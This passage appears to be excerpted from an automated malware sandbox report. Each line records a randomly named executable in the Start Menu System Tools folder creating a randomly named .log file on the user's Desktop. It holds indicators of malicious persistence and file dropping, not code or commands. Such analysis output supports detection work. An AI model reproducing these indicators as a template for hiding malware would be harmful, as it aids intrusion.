                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\zYgEJQlz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\AVHMeQAt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\qmowuovM.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\iIfHKufe.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\XUBRajkw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\PrtbrpVP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FIZLHNPh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vZGvXkKA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eSpQDyfl.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\cITPDfAk.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\TeKaTmkD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LBCkjtUW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BSjUAQPo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\toafQXzH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jFHPguuZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZXnzwSps.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\IQXUcfJd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\wWhDskZv.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\otZOJrJN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\fPQYZyug.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WgxIpVoy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DUVDVzTj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\cZaiSBtn.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RlvripyF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\AefMODTq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\rAWXeJDJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\hMsguyJb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YjjrLEtu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\lZLXuWSy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nbyFPFWu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WUhawSrf.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\MmOLMqmx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DDuvcNgQ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\sPQEsCmi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\bIzZYPGT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RZgJomBm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ASPeVAWX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\yHtdVhrW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\pekolobp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\oZZOlFlp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\XRIjRSGa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\PoAthZqt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FFhdxwlL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ntFYeaQw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\dKlIuyLO.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\SWHRKmQg.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\KszcatAz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\JnnBaKLz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\sgXWGXfk.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\hssgXLlC.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FxxLTNKF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\pvrGzKVr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eHNQPyaJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NAwlwLuv.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DMSuMAAN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\tdyfcXuf.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\sKHPBBwF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\iWdYRpBW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\HgsdOaRa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\xxZNeyLt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nOGxuVGL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\UxTRaQvw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DqCnHdQh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\uMuxXkBA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\TqUKVeNE.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eWPiaGig.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VtGsqNSz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\MKncHkNR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BWJmXZSj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kPsHDmnV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\agYrTKhn.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RxFbjhcG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\HPmLzFXY.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\zldVQLHr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\qHVggSrJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\pCKGgjCJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YvtbMwXu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WlXaMeru.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\EeGvsrMf.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vvnfIPHx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eoWApcbj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\TArJFQhB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\SugjFhrA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\JRYtVobT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kDcZKjpC.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\TnccMNji.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\KFIMcleA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\AWpwsIZS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\iKNqYmED.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YbtaoKyW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\OnPkEyEo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\wgyFlLYZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nxfpBjTr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eTWARqDK.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WqOKhwod.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VlDkhNyc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CYbeNrdN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\uvTpeyOg.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kMzZuVIy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZYViKKNQ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\GGiDqFDB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\fQyImqSF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WiesDNNX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NEWCTUxq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\EVCmjrsI.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\mOmHPFNu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\bVwqfKcL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\IJUlMoHw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\zaBVcLCP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\qwtgsSmh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZpcBYfHT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\XfGAYNcS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\rkdyzPpO.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BQYWEsJr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\shEGUPEJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jEwQkWoc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\aVcAAtju.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RrULRATN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\HJAvhXOf.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\pwZqNBtQ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\fNFadZoi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\XkxktgYB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VZbjtNtA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\MwSuJUdT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vpCPqhyF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ukroqyJE.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kBXYGWDW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RjktmRtH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\XcNSPwyw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\KDDLYXsV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YZpakwNq.logJump to dropped file
